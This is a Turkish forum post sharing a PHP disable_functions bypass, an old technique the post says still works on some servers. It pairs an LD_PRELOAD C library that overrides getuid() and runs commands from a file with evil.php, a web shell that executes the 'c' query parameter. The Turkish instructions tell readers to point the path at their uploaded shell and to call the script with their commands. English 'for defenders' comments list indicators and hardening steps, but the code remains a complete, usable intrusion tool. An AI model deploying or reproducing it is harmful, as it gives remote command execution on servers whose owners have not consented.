
Proc open Bypass tools

Eski bir tekniktir ama işe yaradığı serverler hala var.
a.c kodu:

Code:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
 * Analysis notes, written for defenders.
 *
 * This object defines its own getuid(). evil.php on the same page starts a
 * process with LD_PRELOAD pointing at a.so, so a dynamically linked program
 * started that way resolves getuid() to this body instead of libc's
 * (presumably the shell launched by proc_open calls getuid() early; confirm
 * on the affected host).
 *
 * What the body does, in order: reads one line from ".comm", echoes it to
 * file descriptor 2, passes it to system(), moves "output.txt" to ".comm1",
 * and returns 0 to the caller.
 *
 * Forensic value: evil.php opens descriptor 2 of the child on errors.txt in
 * append mode, so the write() below leaves a running log of every string
 * that was executed. Other artifacts are .comm, .comm1, output.txt and the
 * a.so <-> b.so rename churn, all resolved relative to the process's
 * working directory.
 *
 * No return value is checked (malloc, fopen, fgets); a missing or empty
 * .comm would likely make the host process fault, so unexplained crashes
 * of short-lived children of the web server are worth correlating.
 */
int getuid()
{
/* 'en' is declared but never used. */
char *en;
char *buf=malloc(300);
FILE *a;

/* Drop the preload variable from this process's environment so that the
 * children started by system() below do not inherit it. */
unsetenv("LD_PRELOAD");
/* ".comm" is the file evil.php fills from the request parameter "c";
 * its content is attacker-controlled by construction. */
a=fopen(".comm","r");
/* At most 99 bytes plus the terminator are read. buf is replaced by
 * fgets()'s return value, which is NULL on EOF or error. */
buf=fgets(buf,100,a);
/* Descriptor 2 is errors.txt when started from evil.php: this line is
 * what records the command string there. */
write(2,buf,strlen(buf));
fclose(a);
/* The library is renamed for the duration of the command and restored
 * afterwards -- presumably a second guard against being loaded again by
 * the child; TODO confirm. File-integrity or audit rules on rename
 * events for *.so under web-writable paths will see this pair. */
rename("a.so","b.so");
/* Runs the stored string through the shell. Its stdout is inherited, which
 * under evil.php is output.txt. */
system(buf);
/* Hands the captured output to evil.php under the name it polls for. */
system("mv output.txt .comm1");
rename("b.so","a.so");
free(buf);
/* The host program is told its real uid is 0; whatever it decides based
 * on getuid() is therefore unreliable in this process. */
return 0;
}
derlemesi:cc -o a.so - fPIC - shared a.c

evil.php kodu:
Code:
<?php 
// Analysis notes, written for defenders. This script is the web-facing half
// of the sample: it takes a string from the query parameter "c", stores it in
// a dotfile, and starts a process whose environment carries LD_PRELOAD
// pointing at a.so under $path. Nothing in the script authenticates the
// caller, so anyone who can request it controls that string.
// Indicators on disk, all under $path: .comm, .comm1, output.txt, errors.txt,
// a.so (renamed to b.so and back by the library). The request itself leaves
// "c=" in the access log.
// Hardening that removes the preconditions: list proc_open in
// disable_functions when the application does not spawn processes, keep the
// document root non-writable for the PHP user, and mount any directory that
// must stay writable noexec so a library cannot be mapped from it.

$path="/var/www"; //change to your writable path 


// The raw request value is written to disk unchanged; no validation or
// length limit is applied here.
$a=fopen($path."/.comm","w"); 
fputs($a,$_GET["c"]); 
fclose($a); 

// Child's stdin is a pipe, stdout is output.txt (truncated on each run) and
// stderr is errors.txt opened in append mode, so errors.txt grows across
// requests and is never cleared by this script.
$descriptorspec = array( 
 0 => array("pipe", "r"), 
 1 => array("file", $path."/output.txt","w"), 
 2 => array("file", $path."/errors.txt", "a" ) 
); 

$cwd = '.'; 
// The environment handed to the child consists of this one variable. A
// process whose environment has LD_PRELOAD pointing into a web-writable
// directory is a high-signal detection on its own.
$env = array('LD_PRELOAD' => $path."/a.so"); 
// Per the inline comment the command string is only an example and is not
// expected to succeed; the sample depends on the process start with the
// environment above. The return value is not checked and the handle is
// never passed to proc_close().
$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed 


// Fixed one-second wait; nothing synchronises with the child, and the
// fopen() result below is used without a check.
sleep(1); 
$a=fopen($path."/.comm1","r"); 

// File contents are echoed into the response without HTML escaping.
echo "<pre><b>"; 
while (!feof($a)) 
{$b=fgets($a);echo $b;} 
fclose($a); 
echo "</pre>"; 

?>
$ path =" /home/xxxxxx/public_html/dizin/; <----- bu kısmı sheli attığınız yere göre düzenleyin

bypass.www.site.com/evil.php?c=komut
